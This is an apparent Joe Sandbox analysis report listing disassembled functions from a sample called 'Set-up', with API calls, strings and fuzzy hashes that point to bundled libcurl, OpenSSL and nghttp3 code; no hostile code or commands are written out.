Function 005FE1F0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 005FE209

Part of subcall function 005F4620: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000004,?,?,00000000,?,00601478,?,?,?), ref: 005F4643

Strings

Unable to allocate memory for FXP_REMOVE packet, xrefs: 005FE374
SFTP unlink packet too short, xrefs: 005FE35A
SFTP Protocol Error, xrefs: 005FE3AA
Error waiting for FXP STATUS, xrefs: 005FE3BD
Unable to send FXP_REMOVE command, xrefs: 005FE36B

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _time64memcpy
String ID: Error waiting for FXP STATUS$SFTP Protocol Error$SFTP unlink packet too short$Unable to allocate memory for FXP_REMOVE packet$Unable to send FXP_REMOVE command
API String ID: 1622878224-2749593575
Opcode ID: 661cd611b2f098fdd5eb5ecb8be1b9d38ad447a4c2390a668b09b434f77437d7
Instruction ID: f1c9ca28d9f81fc22e629e2636aa61b719a92c2a65516d60987bcb4f077b71cc
Opcode Fuzzy Hash: 661cd611b2f098fdd5eb5ecb8be1b9d38ad447a4c2390a668b09b434f77437d7
Instruction Fuzzy Hash: DF51C170504309ABDB209F24DC4AB7BBFE5BF41314F144D2DF659972A2E779A8048B62

Function 00516220 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143stringCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0051623A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0051624D
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0051627C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00516389

Strings

., xrefs: 00516399
hsts.c, xrefs: 005162C9, 005162DB, 00516339, 0051634B

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlen$_time64memcpy
String ID: .$hsts.c
API String ID: 2198566249-2242870694
Opcode ID: 3484329eba366c280480d9bc9f4090c2bcfbd7f857289460b819ba70c6775a41
Instruction ID: 1308e97e0edf29644c1154abf565fd98cfa808018260b5696f2f41fb35689bfc
Opcode Fuzzy Hash: 3484329eba366c280480d9bc9f4090c2bcfbd7f857289460b819ba70c6775a41
Instruction Fuzzy Hash: 7441DCB9D043456BFB10BA64AC4ABDB3E98BF58315F080838FD5993183F671D994C693

Function 00548970 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,0052C0E6,?,00000000,00000000,?,?,?,?,0052AEFD,?), ref: 00548979
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(host!,?,00000005), ref: 005489EA
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(ifhost!,?,00000007), ref: 005489FE
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000021,-000000F9), ref: 00548A53

Part of subcall function 0052CF80: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,005530A3,00AFF327,00000001,?,?,?,?,00000000,?,00552436), ref: 0052CFA5

Strings

cf-socket.c, xrefs: 00548AA8
ifhost!, xrefs: 005489F9
host!, xrefs: 005489E5

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strncmp$memchrmemcpystrlen
String ID: cf-socket.c$host!$ifhost!
API String ID: 365951775-461468357
Opcode ID: 77f67ef87c25da83a0b99931e4a7872dd0844a54716eab3be17c39c9392b727f
Instruction ID: e0a18f4265a993a12c19bae5dd9525cf13c9040635dd191a41a4a635c68f8cbe
Opcode Fuzzy Hash: 77f67ef87c25da83a0b99931e4a7872dd0844a54716eab3be17c39c9392b727f
Instruction Fuzzy Hash: 6E31E3B1A052161BEF1499399C597BF3E84BB5236CF090539FC85AB3C2EA758C0493A2

Function 00894430 Relevance: 10.6, APIs: 7, Instructions: 108stringnetworkCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0000002E), ref: 0089447B
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000042), ref: 008944C4
WSAStringToAddressW.WS2_32(?,00000002,00000000,?,00000010), ref: 008944E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(0000002E), ref: 00894500
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0089450B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0000002E), ref: 0089451F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00894546

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlen$strcmp$AddressByteCharMultiStringWide
String ID:
API String ID: 389649969-0
Opcode ID: 1ced1f8a9e2dc7a32853b20d7d676ef64446850c6e498f0f5265dcf33502b107
Instruction ID: 65fde37b515fda6256047d51a18b1a3a51bd69b0ba35a40ce3fae0b7367ba2ff
Opcode Fuzzy Hash: 1ced1f8a9e2dc7a32853b20d7d676ef64446850c6e498f0f5265dcf33502b107
Instruction Fuzzy Hash: E2313BB190430567FF20B664DC01FBF768CFB91358F0D4228F948D61C1FA75AD458262

Function 00752240 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,0074F763,?,?,?,?,?), ref: 00752251
WideCharToMultiByte.KERNEL32 ref: 00752284
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 007522BD

Strings

ERR_CAPI_error, xrefs: 0075231A
engines/e_capi.c, xrefs: 00752299, 007522D0, 00752342
engines/e_capi_err.c, xrefs: 00752321

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$wcslen
String ID: ERR_CAPI_error$engines/e_capi.c$engines/e_capi_err.c
API String ID: 1062461220-336193293
Opcode ID: c02cdfffb8d783a6c57f7516d7ea1e7dfe64928eb3761870db03d9d8d48056f2
Instruction ID: 3b01703fd18cd9f3a643ab01a0109fb330ef375ec06eb6255ce2bb47000a79b4
Opcode Fuzzy Hash: c02cdfffb8d783a6c57f7516d7ea1e7dfe64928eb3761870db03d9d8d48056f2
Instruction Fuzzy Hash: 3621F9A1F043006AF6303B61AC4AF6B3A99EB42715F08413DFD0895193E6FC485A8BA5

Function 009BC2E0 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 009BC2F9
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 009BC313
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 009BC3C1

Part of subcall function 009C0790: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,009BC32A), ref: 009C07A3
Part of subcall function 009C0790: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,009BC32A), ref: 009C07C2

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 009BC37B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 009BC3AB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 009BC3B3

Strings

4, xrefs: 009BC2E6

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: free$calloc$malloc
String ID: 4
API String ID: 3103867982-4088798008
Opcode ID: 9efe2e4e9da220ea36655f13678133c5a91bea1987f80b2d892d8a4c0219284d
Instruction ID: 8b11cb0f74251e4fd90754214fa08a8cb3619771fa184df2863c01383c6cf164
Opcode Fuzzy Hash: 9efe2e4e9da220ea36655f13678133c5a91bea1987f80b2d892d8a4c0219284d
Instruction Fuzzy Hash: 1C2138B1404719CACB10AF78858439E7BE4FF05324F45891DE8999B282DB75E904CBD2

Function 005B87E0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 61COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(n <= balloc->blklen,nghttp3_balloc.c,00000042,?,00000000,?,005B4D5A,00000000,?,000001F0), ref: 005B8861
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(((uintptr_t)balloc->buf.last & 0xfu) == 0,nghttp3_balloc.c,00000055,?,000001F0), ref: 005B8873

Strings

n <= balloc->blklen, xrefs: 005B885C
ZM[, xrefs: 005B87E7, 005B8807
nghttp3_balloc.c, xrefs: 005B8857, 005B8869
((uintptr_t)balloc->buf.last & 0xfu) == 0, xrefs: 005B886E

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assert
String ID: ((uintptr_t)balloc->buf.last & 0xfu) == 0$ZM[$n <= balloc->blklen$nghttp3_balloc.c
API String ID: 1222420520-2642094360
Opcode ID: 9ee36e6698268f1a8b0d8d70411e807f2bbe944d08d21e42da85c98310b28b2c
Instruction ID: 412fc189ed17ab9cb3b7f3bdb4f03624a31d436d5215fc2031cb04c9b2cf92c7
Opcode Fuzzy Hash: 9ee36e6698268f1a8b0d8d70411e807f2bbe944d08d21e42da85c98310b28b2c
Instruction Fuzzy Hash: 1911E5B6A44702AFD6009F24EC45AAABBA8FF45721B445A24F814D72D2DB30F850C7E5

Function 008828F0 Relevance: 10.3, APIs: 8, Instructions: 342COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000005,?,?,?,?,0086DA6D,00000000,00C4A9B4,?,?,?,?,?), ref: 0088299B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00882A76
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00020000), ref: 00882A82
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00882AAE
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00882ABA
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00882B3F
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00882C32
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000005,?,?,?,?,?,?,0086DA6D,00000000,00C4A9B4,?,?,?,?,?), ref: 00882CB2

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: 270526b5f8b6274ec66a06248099fa21ded22f0d379f24df784e0f9e933fa776
Instruction ID: 3c8bd24f9f64439c52eb910b5af720186d71f31b236cfa48d486ede71d717b1c
Opcode Fuzzy Hash: 270526b5f8b6274ec66a06248099fa21ded22f0d379f24df784e0f9e933fa776
Instruction Fuzzy Hash: C1D15FB16042199BCB14EF2CC884AAA7BE5FF88314F198629FC59D7391D771DC40CB95

Function 009BC3F0 Relevance: 9.2, APIs: 6, Instructions: 229COMMON

Download Yara Rule

APIs

setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 009BC435
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 009BC445
setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 009BC467

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: setlocale$_strdup
String ID:
API String ID: 134968984-0
Opcode ID: 921f2d3044aa7842563970f6679ec225842d881172920e85ed190010a4b83b27
Instruction ID: 09cf542da1e69df4a148f5dd23ab6fd7cb91fd79d572bea9da9a7774e46cf102
Opcode Fuzzy Hash: 921f2d3044aa7842563970f6679ec225842d881172920e85ed190010a4b83b27
Instruction Fuzzy Hash: 36917DB1608745CFC710CF29C58179AB7E5FF89328F044A1EE99497351D778EA45CB82

Function 006C81F0 Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 198stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,0066A9CE,000000D2), ref: 006C83A3
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0066A9CE), ref: 006C83C6

Part of subcall function 006C60E0: GetLastError.KERNEL32(006C7CCC,?,00000000,006C7127,006C7CCC,00000000,006ECAB7,00511A70), ref: 006C60E3
Part of subcall function 006C60E0: SetLastError.KERNEL32(00000000), ref: 006C61A5

Strings

crypto/err/err_local.h, xrefs: 006C8311, 006C8332, 006C8385, 006C83E8, 006C84BB

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: ErrorLast$strcpystrlen
String ID: crypto/err/err_local.h
API String ID: 542397150-344804083
Opcode ID: 999e31b13ee710e73c0fad2b23411fd3a210cf6ce2619e155a30304897423426
Instruction ID: da3770e455f7dd76a018fd9cacdda3009ca47b6af160b1faf23e7f36373da5f3
Opcode Fuzzy Hash: 999e31b13ee710e73c0fad2b23411fd3a210cf6ce2619e155a30304897423426
Instruction Fuzzy Hash: 59815FB1900B01AFE7339F29E889BF2B7D1FB4031CF04491CE595872A5DB79A525CB41

Function 00516730 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 179stringCOMMON

Download Yara Rule

APIs

Part of subcall function 005173F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,0051CA95,00AF6A38,00000467,mprintf.c), ref: 0051741D
Part of subcall function 005173F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00517445

Part of subcall function 005547D0: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000080,00000080,?), ref: 005547FB
Part of subcall function 005547D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0055480C
Part of subcall function 005547D0: feof.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00554837

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 00516844
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unlimited,0000000A), ref: 00516876
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 005168FD

Strings

hsts.c, xrefs: 00516748, 0051675D, 00516777, 0051691D, 0051694E, 0051696F
unlimited, xrefs: 0051686C
%256s "%64[^"]", xrefs: 00516857

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

